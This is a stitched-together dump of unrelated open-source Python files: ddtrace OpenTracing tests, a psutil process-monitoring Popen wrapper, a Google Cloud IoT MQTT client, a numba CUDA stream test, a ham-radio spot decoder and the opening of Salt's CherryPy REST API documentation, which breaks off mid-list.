"""Start a child span and finish it after its parent."""
span1 = ot_tracer.start_active_span("one").span
span2 = ot_tracer.start_active_span("two").span
span1.finish()
time.sleep(0.005)
span2.finish()
spans = test_spans.pop()
assert len(spans) == 2
assert spans[0].parent_id is None
assert spans[1].parent_id is span1._dd_span.span_id
assert spans[1].duration > spans[0].duration
def test_start_span_multi_intertwined(self, ot_tracer, test_spans):
"""Start multiple spans at the top level intertwined.
Alternate calling between two traces.
"""
import threading
# synchronize threads with a threading event object
event = threading.Event()
def trace_one():
_id = 11
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
pass
event.set()
def trace_two():
_id = 21
event.wait()
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
pass
# the ordering should be
# t1.span1/t2.span1, t2.span2, t1.span2, t1.span3, t2.span3
t1 = threading.Thread(target=trace_one)
t2 = threading.Thread(target=trace_two)
t1.start()
t2.start()
# wait for threads to finish
t1.join()
t2.join()
spans = test_spans.pop()
# trace_one will finish before trace_two so its spans should be written
# before the spans from trace_two, let's confirm this
assert spans[0].name == "11"
assert spans[1].name == "12"
assert spans[2].name == "13"
assert spans[3].name == "21"
assert spans[4].name == "22"
assert spans[5].name == "23"
# next let's ensure that each span has the correct parent:
# trace_one
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# trace_two
assert spans[3].parent_id is None
assert spans[4].parent_id is spans[3].span_id
assert spans[5].parent_id is spans[3].span_id
# finally we should ensure that the trace_ids are reasonable
# trace_one
assert spans[0].trace_id == spans[1].trace_id and spans[1].trace_id == spans[2].trace_id
# traces should be independent
assert spans[2].trace_id != spans[3].trace_id
# trace_two
assert spans[3].trace_id == spans[4].trace_id and spans[4].trace_id == spans[5].trace_id
def test_start_active_span(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("one") as scope:
pass
assert scope.span._dd_span.name == "one"
assert scope.span.finished
spans = test_spans.pop()
assert spans
def test_start_active_span_finish_on_close(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("one", finish_on_close=False) as scope:
pass
assert scope.span._dd_span.name == "one"
assert not scope.span.finished
spans = test_spans.pop()
assert not spans
scope.span.finish()
def test_start_active_span_nested(self, ot_tracer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
assert ot_tracer.active_span == outer_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
with ot_tracer.start_active_span("three") as innest_scope: # why isn't it innest? innermost so verbose
assert ot_tracer.active_span == innest_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
assert ot_tracer.active_span == outer_scope.span
assert ot_tracer.active_span is None
def test_start_active_span_trace(self, ot_tracer, test_spans):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
outer_scope.span.set_tag("outer", 2)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("three") as innest_scope:
innest_scope.span.set_tag("innerest", 4)
spans = test_spans.pop()
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
assert spans[3].parent_id is spans[2].span_id
def test_interleave(self, dd_tracer, ot_tracer, test_spans):
with ot_tracer.start_active_span("ot_root_1", ignore_active_span=True):
with dd_tracer.trace("dd_child"):
with ot_tracer.start_active_span("ot_child_1"):
pass
with ot_tracer.start_active_span("ot_child_2"):
pass
spans = test_spans.pop()
assert len(spans) == 4
assert spans[0].name == "ot_root_1" and spans[0].parent_id is None
assert spans[1].name == "dd_child" and spans[1].parent_id == spans[0].span_id
assert spans[2].name == "ot_child_1" and spans[2].parent_id == spans[1].span_id
assert spans[3].name == "ot_child_2" and spans[3].parent_id == spans[0].span_id
def test_active_span(self, ot_tracer, test_spans):
with ot_tracer._dd_tracer.trace("dd") as span:
assert ot_tracer.active_span is not None
assert ot_tracer.active_span._dd_span is span
@pytest.fixture
def nop_span_ctx():
return SpanContext(sampling_priority=AUTO_KEEP)
class TestTracerSpanContextPropagation(object):
"""Test the injection and extraction of a span context from a tracer."""
def test_invalid_format(self, ot_tracer, nop_span_ctx):
"""An invalid format should raise an UnsupportedFormatException."""
# test inject
with pytest.raises(UnsupportedFormatException):
ot_tracer.inject(nop_span_ctx, None, {})
# test extract
with pytest.raises(UnsupportedFormatException):
ot_tracer.extract(None, {})
def test_inject_invalid_carrier(self, ot_tracer, nop_span_ctx):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.inject(nop_span_ctx, Format.HTTP_HEADERS, None)
def test_extract_invalid_carrier(self, ot_tracer):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.extract(Format.HTTP_HEADERS, None)
def test_http_headers_base(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
def test_http_headers_baggage(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_empty_propagated_context(self, ot_tracer):
"""An empty propagated context should raise a
SpanContextCorruptedException when extracted.
"""
carrier = {}
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.HTTP_HEADERS, carrier)
def test_text(self, ot_tracer):
"""extract should undo inject for http headers"""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.TEXT_MAP, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_corrupted_propagated_context(self, ot_tracer):
"""Corrupted context should raise a SpanContextCorruptedException."""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
# manually alter a key in the carrier baggage
del carrier[HTTP_HEADER_TRACE_ID]
corrupted_key = HTTP_HEADER_TRACE_ID[2:]
carrier[corrupted_key] = 123
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.TEXT_MAP, carrier)
def test_immutable_span_context(self, ot_tracer):
"""Span contexts should be immutable."""
with ot_tracer.start_span("root") as root:
ctx_before = root.context
root.set_baggage_item("test", 2)
assert ctx_before is not root.context
with ot_tracer.start_span("child") as level1:
with ot_tracer.start_span("child") as level2:
pass
assert root.context is not level1.context
assert level2.context is not level1.context
assert level2.context is not root.context
def test_inherited_baggage(self, ot_tracer):
"""Baggage should be inherited by child spans."""
with ot_tracer.start_active_span("root") as root:
# this should be passed down to the child
root.span.set_baggage_item("root", 1)
root.span.set_baggage_item("root2", 1)
with ot_tracer.start_active_span("child") as level1:
level1.span.set_baggage_item("level1", 1)
with ot_tracer.start_active_span("child") as level2:
level2.span.set_baggage_item("level2", 1)
# ensure immutability
assert level1.span.context is not root.span.context
assert level2.span.context is not level1.span.context
# level1 should have inherited the baggage of root
assert level1.span.get_baggage_item("root")
assert level1.span.get_baggage_item("root2")
# level2 should have inherited the baggage of both level1 and level2
assert level2.span.get_baggage_item("root")
assert level2.span.get_baggage_item("root2")
assert level2.span.get_baggage_item("level1")
assert level2.span.get_baggage_item("level2")
class TestTracerCompatibility(object):
"""Ensure that our opentracer produces results in the underlying datadog tracer."""
def test_required_dd_fields(self):
"""Ensure required fields needed for successful tracing are possessed
by the underlying datadog tracer.
"""
# a service name is required
tracer = Tracer("service")
with tracer.start_span("my_span") as span:
assert span._dd_span.service
def test_set_global_tracer():
"""Sanity check for set_global_tracer"""
my_tracer = Tracer("service")
set_global_tracer(my_tracer)
assert opentracing.tracer is my_tracer
assert ddtrace.tracer is my_tracer._dd_tracer
|
popen.py
|
#!/usr/bin/env python
# ~ Copyright 2014 Sjoerd Cranen, Wieger Wesselink
#~ Distributed under the Boost Software License, Version 1.0.
#~ (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
import time
import psutil
import threading
import subprocess
class TimeExceededError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MemoryExceededError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class StackOverflowError(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return 'Stack overflow in tool {}'.format(self.name)
class SegmentationFault(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return 'Segmentation fault in tool {}'.format(self.name)
class ToolNotFoundError(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return 'Tool {} does not exist!'.format(self.name)
class Popen(subprocess.Popen):
def __init__(self, *args, **kwargs):
        self.__maxVirtLimit = kwargs.pop('maxVirtLimit', 100000000)
        self.__usrTimeLimit = kwargs.pop('usrTimeLimit', 100000000)
super(Popen, self).__init__(*args, **kwargs)
self.__usrTime = 0
self.__sysTime = 0
self.__maxVirt = 0
self.__maxResident = 0
# workaround for interface changes in psutil
process = psutil.Process(self.pid)
if "get_cpu_times" in dir(process):
self.__perfThread = threading.Thread(target=self.__measure_old)
else:
self.__perfThread = threading.Thread(target=self.__measure_new)
self.__perfThread.daemon = True
self.__perfThread.start()
# uses old interface of psutil
def __measure_old(self):
try:
process = psutil.Process(self.pid)
while self.returncode is None:
self.__usrTime, self.__sysTime = process.get_cpu_times()
virt, res = process.get_memory_info()
self.__maxVirt = max(self.__maxVirt, virt)
self.__maxResident = max(self.__maxResident, res)
if self.__maxVirt > self.__maxVirtLimit:
self.kill()
# raise MemoryExceededError(self.__maxVirt)
if self.__usrTime > self.__usrTimeLimit:
self.kill()
# raise TimeExceededError(self.__usrTime)
time.sleep(0.05)
except psutil.NoSuchProcess:
pass
# uses new interface of psutil
def __measure_new(self):
try:
process = psutil.Process(self.pid)
while self.returncode is None:
t = process.cpu_times()
m = process.memory_info()
self.__usrTime, self.__sysTime = t.user, t.system
self.__maxVirt = max(self.__maxVirt, m.vms)
self.__maxResident = max(self.__maxResident, m.rss)
if self.__maxVirt > self.__maxVirtLimit:
self.kill()
# raise MemoryExceededError(self.__maxVirt)
if self.__usrTime > self.__usrTimeLimit:
self.kill()
# raise TimeExceededError(self.__usrTime)
time.sleep(0.05)
except psutil.NoSuchProcess:
pass
@property
def user_time(self):
return self.__usrTime
@property
def system_time(self):
return self.__sysTime
@property
def max_virtual_memory(self):
return self.__maxVirt
@property
def max_resident_memory(self):
return self.__maxResident
# This requires python3
#if __name__ == '__main__':
# proc = Popen(sys.argv[1:])
# ret = proc.wait()
# print('usr/sys/virt/res: {0}/{1}/{2}/{3}'.format(proc.user_time, proc.system_time, proc.max_virtual_memory, proc.max_resident_memory), file=sys.stderr)
# sys.exit(ret)
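# A small runnable usage sketch (illustration only; it assumes a `sleep`
# executable is available on the PATH and avoids the Python-3-only print above):
if __name__ == '__main__':
    proc = Popen(['sleep', '1'], usrTimeLimit=10, maxVirtLimit=10 ** 9)
    proc.wait()
    print('usr/sys/virt/res: {0}/{1}/{2}/{3}'.format(
        proc.user_time, proc.system_time,
        proc.max_virtual_memory, proc.max_resident_memory))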
|
core.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python Library for connecting to Google Cloud IoT Core via MQTT, using JWT.
"""
import configparser
import datetime
import json
import logging
import os
import threading
import jwt
import paho.mqtt.client as mqtt
logger = logging.getLogger(__name__)
DEFAULT_CONFIG_LOCATION = os.path.join(os.path.dirname(__file__),
'cloud_config.ini')
class CloudIot:
"""Manages a connection to Google Cloud IoT Core via MQTT, using a JWT for device authentication.
You must configure a connection by specifying a Cloud IoT
configuration file (.ini).
Then you can use :meth:`publish_message` to
send an arbitrary message to your cloud project.
"""
def __init__(self, config_file=DEFAULT_CONFIG_LOCATION,
config_section='DEFAULT'):
"""Initialize with device configuration file.
Args:
config_file: Path to your Cloud IoT configuration file (.ini).
config_section: The section name in the .ini file where the Cloud IoT Core
config can be read. By default, it reads from the "[DEFAULT]" section.
"""
self._config = configparser.ConfigParser()
if not self._config.read(config_file):
logger.warning(
'No valid config provided (reading %s).\nCloud IoT is disabled.',
config_file)
self._enabled = False
return
if not self._config.getboolean(config_section, 'Enabled'):
logger.warning('Cloud IoT is disabled per configuration.')
self._enabled = False
return
config = self._config[config_section]
self._project_id = config['ProjectID']
self._cloud_region = config['CloudRegion']
self._registry_id = config['RegistryID']
self._device_id = config['DeviceID']
self._ca_certs = config['CACerts']
self._message_type = config['MessageType']
self._mqtt_bridge_hostname = config['MQTTBridgeHostName']
self._mqtt_bridge_port = config.getint('MQTTBridgePort')
self._mutex = threading.Lock()
# For SW, use RS256 on a key file provided in the configuration.
self._algorithm = 'RS256'
rsa_cert = config['RSACertFile']
with open(rsa_cert, 'r') as f:
self._private_key = f.read()
self._jwt_inst = jwt.PyJWT()
# Create our MQTT client. The client_id is a unique string that identifies
# this device. For Google Cloud IoT Core, it must be in the format below.
self._client = mqtt.Client(
client_id='projects/%s/locations/%s/registries/%s/devices/%s' %
(self._project_id,
self._cloud_region,
self._registry_id,
self._device_id))
# With Google Cloud IoT Core, the username field is ignored, and the
# password field is used to transmit a JWT to authorize the device.
self._client.username_pw_set(
username='unused', password=self._create_jwt())
# Start thread to create new token before timeout.
self._term_event = threading.Event()
self._token_thread = threading.Thread(
target=self._token_update_loop, args=(self._term_event,))
self._token_thread.start()
# Enable SSL/TLS support.
self._client.tls_set(ca_certs=self._ca_certs)
# Connect to the Google MQTT bridge.
self._client.connect(self._mqtt_bridge_hostname,
self._mqtt_bridge_port)
logger.info('Successfully connected to Cloud IoT')
self._enabled = True
self._client.loop_start()
# The topic that the device will receive commands on.
mqtt_command_topic = '/devices/{}/commands/#'.format(self._device_id)
# Subscribe to the commands topic, QoS 1 enables message acknowledgement.
self._client.subscribe(mqtt_command_topic, qos=1)
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
if self._enabled:
# Terminate token thread.
self._term_event.set()
self._token_thread.join()
def enabled(self):
"""Checks whether or not Clout Iot Core is enabled, as per the config file's "Enabled" boolean.
Returns:
True if Cloud Iot Core is enabled, False if it's disabled.
"""
return self._enabled
def project_id(self):
return self._project_id
def publish_message(self, message):
"""Sends an arbitrary message to the Cloud Iot Core service.
Args:
message: The message to send. It can be any message that's serializable
into a JSON message using :func:`json.dumps` (such as a dictionary or
string).
"""
if not self._enabled:
return
with self._mutex:
# Publish to the events or state topic based on the flag.
sub_topic = 'events' if self._message_type == 'event' else 'state'
mqtt_topic = '/devices/%s/%s' % (self._device_id, sub_topic)
# Publish payload using JSON dumps to create bytes representation.
payload = json.dumps(message)
# Publish payload to the MQTT topic. qos=1 means at least once
# delivery. Cloud IoT Core also supports qos=0 for at most once
# delivery.
self._client.publish(mqtt_topic, payload, qos=1)
def register_message_callbacks(self, callbacks):
"""Specifies functions to call upon various MQTT pub/sub messages.
Args:
callbacks: A dict mapping of callback names from `paho.mqtt.client
callbacks <https://pypi.org/project/paho-mqtt/#callbacks>`_
to your own function names.
"""
if 'on_connect' in callbacks:
self._client.on_connect = callbacks['on_connect']
if 'on_disconnect' in callbacks:
self._client.on_disconnect = callbacks['on_disconnect']
if 'on_publish' in callbacks:
self._client.on_publish = callbacks['on_publish']
if 'on_message' in callbacks:
self._client.on_message = callbacks['on_message']
if 'on_unsubscribe' in callbacks:
self._client.on_unsubscribe = callbacks['on_unsubscribe']
if 'on_log' in callbacks:
self._client.on_log = callbacks['on_log']
def _token_update_loop(self, term_event):
"""Update token every 50 minutes (of allowed 60).
Args:
term_event: termination thread event.
"""
while not term_event.wait(50 * 60):
with self._mutex:
self._client.disconnect()
# Set new token.
self._client.username_pw_set(
username='unused', password=self._create_jwt())
# Connect to the Google MQTT bridge.
self._client.connect(
self._mqtt_bridge_hostname, self._mqtt_bridge_port)
logger.info(
'Successfully re-established connection with new token')
def _create_jwt(self):
"""Creates a JWT (https://jwt.io) to establish an MQTT connection.
Returns:
            A JWT generated from the given project_id and private key, which
            expires in 60 minutes. After it expires, the client will be
            disconnected and a new JWT must be generated (the token thread
            refreshes it every 50 minutes).
"""
token = {
# The time that the token was issued at
'iat': datetime.datetime.utcnow(),
# The time the token expires.
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=60),
# The audience field should always be set to the GCP project id.
'aud': self._project_id
}
return self._jwt_inst.encode(token, self._private_key,
algorithm=self._algorithm)
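# A minimal usage sketch (illustration only): it assumes a valid
# cloud_config.ini at the default location and network access to the
# configured MQTT bridge.
if __name__ == '__main__':
    with CloudIot() as cloud:
        if cloud.enabled():
            cloud.publish_message({'status': 'hello from the device'})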
|
test_ptds.py
|
import multiprocessing as mp
import logging
import traceback
from numba.cuda.testing import unittest, CUDATestCase
from numba.cuda.testing import skip_on_cudasim, xfail_with_cuda_python
def child_test():
from numba import cuda, int32, void
from numba.core import config
import io
import numpy as np
import threading
# Enable PTDS before we make any CUDA driver calls. Enabling it first
# ensures that PTDS APIs are used because the CUDA driver looks up API
# functions on first use and memoizes them.
config.CUDA_PER_THREAD_DEFAULT_STREAM = 1
# Set up log capture for the Driver API so we can see what API calls were
# used.
logbuf = io.StringIO()
handler = logging.StreamHandler(logbuf)
cudadrv_logger = logging.getLogger('numba.cuda.cudadrv.driver')
cudadrv_logger.addHandler(handler)
cudadrv_logger.setLevel(logging.DEBUG)
# Set up data for our test, and copy over to the device
N = 2 ** 16
N_THREADS = 10
N_ADDITIONS = 4096
# Seed the RNG for repeatability
np.random.seed(1)
x = np.random.randint(low=0, high=1000, size=N, dtype=np.int32)
r = np.zeros_like(x)
# One input and output array for each thread
xs = [cuda.to_device(x) for _ in range(N_THREADS)]
rs = [cuda.to_device(r) for _ in range(N_THREADS)]
# Compute the grid size and get the [per-thread] default stream
n_threads = 256
n_blocks = N // n_threads
stream = cuda.default_stream()
# A simple multiplication-by-addition kernel. What it does exactly is not
# too important; only that we have a kernel that does something.
@cuda.jit(void(int32[::1], int32[::1]))
def f(r, x):
i = cuda.grid(1)
        if i >= len(r):
return
# Accumulate x into r
for j in range(N_ADDITIONS):
r[i] += x[i]
# This function will be used to launch the kernel from each thread on its
# own unique data.
def kernel_thread(n):
f[n_blocks, n_threads, stream](rs[n], xs[n])
# Create threads
threads = [threading.Thread(target=kernel_thread, args=(i,))
for i in range(N_THREADS)]
# Start all threads
for thread in threads:
thread.start()
# Wait for all threads to finish, to ensure that we don't synchronize with
# the device until all kernels are scheduled.
for thread in threads:
thread.join()
# Synchronize with the device
cuda.synchronize()
# Check output is as expected
expected = x * N_ADDITIONS
for i in range(N_THREADS):
np.testing.assert_equal(rs[i].copy_to_host(), expected)
# Return the driver log output to the calling process for checking
handler.flush()
return logbuf.getvalue()
def child_test_wrapper(result_queue):
try:
output = child_test()
success = True
# Catch anything raised so it can be propagated
except: # noqa: E722
output = traceback.format_exc()
success = False
result_queue.put((success, output))
@skip_on_cudasim('Streams not supported on the simulator')
class TestPTDS(CUDATestCase):
@xfail_with_cuda_python
def test_ptds(self):
# Run a test with PTDS enabled in a child process
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
proc = ctx.Process(target=child_test_wrapper, args=(result_queue,))
proc.start()
proc.join()
success, output = result_queue.get()
# Ensure the child process ran to completion before checking its output
if not success:
self.fail(output)
# Functions with a per-thread default stream variant that we expect to
# see in the output
ptds_functions = ('cuMemcpyHtoD_v2_ptds', 'cuLaunchKernel_ptsz',
'cuMemcpyDtoH_v2_ptds')
for fn in ptds_functions:
with self.subTest(fn=fn, expected=True):
self.assertIn(fn, output)
# Non-PTDS versions of the functions that we should not see in the
# output:
legacy_functions = ('cuMemcpyHtoD_v2', 'cuLaunchKernel',
'cuMemcpyDtoH_v2')
for fn in legacy_functions:
with self.subTest(fn=fn, expected=False):
# Ensure we only spot these function names appearing without a
# _ptds or _ptsz suffix by checking including the end of the
# line in the log
fn_at_end = f'{fn}\n'
self.assertNotIn(fn_at_end, output)
if __name__ == '__main__':
unittest.main()
|
spot_decoder.py
|
#!/usr/bin/env python
#
# Author: Alexander Sholohov <ra9yer@yahoo.com>
#
# License: MIT
#
import sys
import os
import re
import subprocess
import signal
import time
import datetime
import wave
import StringIO
import threading
import httplib, urllib
import urlparse
from inspect import isfunction
#--------------------------------------------
def utc_time_15s_rounded():
x = datetime.datetime.utcnow() + datetime.timedelta(seconds=5)
discard = datetime.timedelta(seconds=(x.second % 15), microseconds=x.microsecond)
return x - discard
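# Illustrative examples: at 12:30:37 UTC the +5s look-ahead gives 12:30:42,
# which rounds down to 12:30:30; at 12:30:56 it gives 12:31:01, which rounds
# down to 12:31:00.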
#--------------------------------------------
def doPOST(url, src, magicKey, mode, utcTime, dbRatio, dtShift, freq, message):
if not url:
return
rec = {}
rec['mode'] = mode
rec['utc_time'] = utcTime
rec['db_ratio'] = dbRatio
rec['dt_shift'] = dtShift
rec['freq'] = freq
rec['src'] = src
rec['magic_key'] = magicKey
rec['message'] = message
params = urllib.urlencode(rec)
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain"}
netparam = urlparse.urlparse(url)
conn = httplib.HTTPConnection(netparam.netloc)
conn.request("POST", netparam.path, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
#--------------------------------------------
def is_callsign(s):
m = re.search('^[A-Z]{1,2}[0-9][A-Z]{1,3}$', s)
    return m is not None
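# Examples: "W1AW" and "RA9YER" match the pattern; lowercase or suffixed
# strings such as "ra9yer" or "RA9YER/P" do not.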
#--------------------------------------------
def is_valid_callsign_in_array(arr):
for s in arr:
if not is_callsign(s):
continue
for elm in cfg.CALLSIGN_PREFIXES:
if s.startswith(elm):
return True
return False
#--------------------------------------------
def decoder_proc(waveName, utcTime, outBaseName):
decodeStartedStamp = datetime.datetime.now()
if not os.path.isfile(waveName):
        print 'File {} does not exist'.format(waveName)
return
# raise Exception('File {} not exist'.format(waveName))
print "Decoding {0}...".format(waveName)
occupiedFileNames = {}
prepareToSend = []
for mode, isFilterNeeded, cmdLine, parser in cfg.DECODER_CHAIN:
print "Process mode: ", mode, isFilterNeeded
fullCmdLine = cmdLine + [waveName]
print "fullCmdLine=", fullCmdLine
p = subprocess.Popen(fullCmdLine, shell=False, stdout=subprocess.PIPE)
outdata, errdata = p.communicate()
if errdata:
print "errdata=", errdata
print "OutData=", outdata
validLineFound = False
for line in StringIO.StringIO(outdata):
params = parser(line)
if not params['is_valid']:
continue
# check for empty message
if not params['message'].strip():
continue
validLineFound = True
if 'utc_time' in params:
utcPrintableTime = params['utc_time']
else:
utcPrintableTime = utcTime.strftime("%H%M%S") if mode.startswith("msk") else utcTime.strftime("%H%M")
itemToSend = (mode, utcPrintableTime, params['snr'].strip(), params['drift'].strip(), params['freq'].strip(), params['message'].strip())
if not isFilterNeeded or is_valid_callsign_in_array(params['message'].split()):
prepareToSend.append(itemToSend)
if validLineFound and cfg.KEEP_DECODED_RESULT:
for suffix in ["", "-1", "-2", "-3", "-4", "-5", "-6"]:
fname = "{}-{}{}.txt".format(outBaseName, mode, suffix)
if fname not in occupiedFileNames:
break
occupiedFileNames[fname] = 1
with open(fname, "w") as fv:
fv.write(outdata)
# remove duplicates
newPrepareToSend = [elm for n,elm in enumerate(prepareToSend) if elm not in prepareToSend[:n]]
# post
for item in newPrepareToSend:
print "Publish to {0}; item={1}".format(cfg.HTTP_SPOT_URI, item)
mode, utcPrintableTime, dbRatio, dtShift, freq, message = item
doPOST(cfg.HTTP_SPOT_URI, cfg.SRC, cfg.POST_MAGIC_KEY, mode, utcPrintableTime, dbRatio, dtShift, freq, message)
# save flac
if len(newPrepareToSend)>0 and cfg.KEEP_DECODED_RESULT:
# compress
print "Compress flac..."
p = subprocess.Popen([cfg.FLAC_CMD, waveName], shell=False, stdout=subprocess.PIPE)
p.communicate()
# delete original wav file
if hasattr(cfg, "KEEP_WAV_FILES") and cfg.KEEP_WAV_FILES:
print "Keep wav file"
else:
print "Remove wav file"
os.remove(waveName)
decodeEndedStamp = datetime.datetime.now()
diff = decodeEndedStamp - decodeStartedStamp
print "Done. decode_duration={0}".format(diff.total_seconds())
#--------------------------------------------
def main():
while(True):
        # wait for the next start boundary (time aligned to START_INTERVAL_IN_SECONDS)
print "Wait for start..."
cnt = 0
while True:
dStart = datetime.datetime.now()
s = int(dStart.minute * 60.0 + dStart.second + dStart.microsecond / 1000000.0 + cfg.LEAD_START_IN_SECONDS)
if s % int(cfg.START_INTERVAL_IN_SECONDS) == 0:
break
time.sleep(0.1)
cnt += 1
if cnt % 50 == 0:
print "second=", dStart.second
print "Started at {0}".format( str(dStart) )
utcTime = utc_time_15s_rounded()
if isfunction(cfg.WORKING_DIR):
dirName = cfg.WORKING_DIR(utcTime)
else:
dirName = cfg.WORKING_DIR
if not os.path.exists(dirName):
os.makedirs(dirName)
baseName = cfg.BASE_FILE_NAME(dirName, dStart, utcTime)
rawName = baseName + ".raw"
waveName = baseName + ".wav"
fv = open(rawName, "wb")
print "Start write to {0}".format(rawName)
cn = []
for item in cfg.CMD_CHAIN:
if len(cn) == 0:
p = subprocess.Popen(item, shell=False, stdout=subprocess.PIPE ) # first
elif len(cn) == len(cfg.CMD_CHAIN) - 1 :
p = subprocess.Popen(item, shell=False, stdin=cn[-1].stdout, stdout=fv) # last
else:
p = subprocess.Popen(item, shell=False, stdin=cn[-1].stdout, stdout=subprocess.PIPE) # middle
cn.append(p)
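        # cn now holds the recording pipeline: the first command produces the
        # samples, any middle commands transform them, and the final command
        # writes the raw audio into fv (the .raw file).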
print "Writing...Wait for end record..."
cnt = 0
while True:
dCurr = datetime.datetime.now()
diff = dCurr - dStart
if diff.total_seconds() > cfg.RECORD_DURATION_IN_SECONDS:
break
if cnt % 20 == 0:
print "seconds writed =", diff.total_seconds()
time.sleep(0.25)
cnt += 1
print "Terminating..."
# kill entire chain
os.kill(cn[0].pid, signal.SIGTERM)
for item in cn:
item.wait()
print "Record ended."
numBytes = fv.tell()
fv.close()
# prepend wav header
with open(waveName, "wb") as dst, open(rawName, "rb") as fv:
w = wave.Wave_write(dst)
w.setparams((1, 2, cfg.AUDIO_SAMPLE_RATE, numBytes/2, 'NONE', 'NONE'))
w.writeframesraw(fv.read())
w.close()
os.remove(rawName) # delete raw file
print "waveName=", waveName
t1 = threading.Thread(target=decoder_proc, args=(waveName, utcTime, baseName))
t1.start()
#--------------------------------------------
if __name__ == '__main__':
# === Load configuration script ===
if len(sys.argv)==1:
config_script = 'spot_cfg'
else:
config_script = sys.argv[1]
print "use config script {0}.py".format(config_script)
cfg = __import__(config_script)
main()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends: - CherryPy Python module
:optdepends: - ws4py Python module for websockets support.
:configuration: All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` function in Salt (note
the dependencies for this module).
.. code-block:: bash
% salt-call tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
